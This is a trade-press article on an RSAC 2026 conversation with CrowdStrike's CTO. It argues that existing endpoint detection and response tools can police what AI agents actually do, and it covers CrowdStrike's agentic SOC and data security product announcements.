CrowdStrike RSAC 2026 Elia Zaitsev agentic threat surface https://unsplash.com/photos/a-room-with-a-lot-of-blue-lights-on-it-8C7qT1-86cg

The Agentic Threat Surface Already Has A Defense

The cybersecurity industry has spent the better part of two years trying to figure out how to secure AI agents. Most of that energy has pointed upstream: model governance, configuration hardening, intent-based policy layers, guardrails. Those things aren’t wrong. But they’re not enough, and focusing too heavily on them means the industry may be looking for the answer in the wrong place.

I had an opportunity to chat with Elia Zaitsev, CTO at CrowdStrike, at RSAC 2026, and the conversation kept coming back to one point. The real question in agentic security isn’t what an agent intends to do. It’s what you allow it to actually do.

Intent Isn’t the Problem

“The problem isn’t when an agent, whether it’s been hijacked or hallucinates and says, ‘I want to go call out to this untrusted remote server,'” Zaitsev said. “The fact that it intends to do that is not the problem. The problem is, do you allow that to occur or not?”

That framing should be familiar to anyone who thinks in terms of kill chains. You have opportunities to stop an attack at every stage, but the damage is done by actions on objectives. With AI agents, the same logic applies. The reasoning that happens inside the model is opaque, non-deterministic, and fast. But the actions that come out the other end are concrete, observable, and controllable.

Zaitsev mused sarcastically, “If only we had technology that was able to understand the lineage of behaviors and conclusively track all the actions on a runtime system, be able to apply policy, be able to prevent it pre-execution from occurring,” he said. “We do. It’s called EDR. It runs on the endpoint, it runs in the cloud, and it’s been a 15-year-plus product that has been matured and tested at scale.”

A Deterministic Problem at the End of a Non-Deterministic Chain

The part people fixate on—the agent’s internal reasoning—is genuinely hard to control. It’s black-box, it can surprise you and intent-based guardrails only go so far. Upstream controls matter, and they help filter out noise, but they’re not fully solvable in the way people sometimes imply.

The action layer is different. Once an agent reaches out to execute something in the real world—call an API, access a file, move laterally across a network—that activity is deterministic, structured, and visible. That’s the layer where defenders have the most leverage. And it’s the same layer where endpoint detection and response has been doing exactly this work for over a decade, just against human attackers.

Agents may be faster and less predictable in their reasoning than a human attacker, but they still have to do things in the real world to cause damage. And doing things in the real world—on endpoints, in cloud environments, across identity systems—is precisely the terrain where that defense technology already operates.

The SOC Problem Is Already Here

The challenge isn’t just about securing agents from outside attack. It’s about how the enterprise uses them at all. The whole reason organizations are deploying AI in the SOC is that alert volume already exceeds human capacity. If a person can review every decision the agent makes, you didn’t actually need the agent. And the pace is only going to accelerate.

There’s a compounding effect at work. The attack surface grows as agents multiply across the enterprise. Adversaries are adopting agentic tools, too. And even well-intentioned detection engineering adds pressure—because the cost of false positives drops sharply when automated triage handles them, detection engineers can afford to run noisier detections and catch threats they’d have thrown away before. CrowdStrike says its agentic detection triage achieves accuracy equivalent to a human analyst at a fraction of the time and cost, which changes the math considerably.

Zaitsev noted that historically, a detection with a 50% false positive rate was too noisy to ship. If automated triage absorbs that noise at near-zero marginal cost, you start deploying detections you’d previously discarded. Volume goes up. The case for human review of every alert gets weaker by the quarter.

Building Trust Before the Handoff

Higher autonomy requires established trust first. Early Waymo vehicles had a human in the car, not touching the wheel until trust was earned. The progression wasn’t about removing human control as fast as possible—it was about accumulating enough validated data to justify each next step.

The same logic needs to apply in security. A lot of what’s happening right now with agentic AI is closer to what you might call vibe evaluation: run a demo, see it work once, call it good. That’s not a foundation for trust, and it’s not a foundation for detecting problems when things change. The path forward requires benchmarking, auditing, and continuous measurement—the kind of discipline that tells you when a model has drifted before the results get bad.

That matters more in cybersecurity than in almost any other domain. Zaitsev pointed out that an agent that writes marketing copy operates in a domain that changes slowly. An agent that files taxes operates in a domain that changes, but the changes are public. Cybersecurity is neither. Adversaries innovate in private. You won’t know when they’ve shifted tradecraft until your models stop working. Human expertise is still the mechanism by which those shifts get detected, responses get built, and updated capability gets pushed back into the automated stack.

What CrowdStrike Announced at RSA

CrowdStrike put several products on the table at RSAC 2026 that reflect this thinking. Agentic MDR, delivered through Falcon Complete, combines deterministic automation with AI-driven investigation and human oversight for complex decisions. Internal testing showed investigations up to 5x faster compared to the longest human investigation times, and more than 3x higher triage accuracy in high-confidence benign classification when powered by NVIDIA Nemotron models. New SOC Transformation Services are aimed at helping organizations build the operational foundation—data pipelines, governance, workflow design—needed to actually run an agentic SOC.

Falcon Data Security addresses a different dimension of the same problem: data theft. Legacy data protection tools were built for a world where data was static. In the agentic enterprise, data is constantly moving—across endpoints, SaaS applications, cloud, browser, and AI workflows. The product is designed to discover, classify, and stop data theft in real time across that entire surface.

Charlotte AI AgentWorks opens the platform to third-party developers building their own agents, with the goal of letting organizations create security agents on the Falcon platform rather than standing up separate systems with no runtime oversight baked in.

The Tools Already Exist

The security industry doesn’t need to build an entirely new category of tools to address the agentic threat surface. The principles proven against human attackers translate directly. Intercept the kill chain before actions on objectives. Apply policy at the runtime layer. Use telemetry to understand behavior lineage. Audit, benchmark, adjust.

“I don’t disagree. Applying known user behavior controls to agents is a no-brainer,” explained Richard Stiennon, author of “Guardians of the Machine Age: Why AI Security Will Define the Future of Digital Defense. “This is why the problem has breathed new life into the identity and access management space. But most organizations are so concerned about agent security that they are failing to leverage agents in their operations. Agents represent the biggest productivity gain in economic history. Yes, secure agents, but much more importantly: Deploy agents!”

The defense tools exist. Whether organizations trust them enough to actually use them on agents is a different question.

Scroll to Top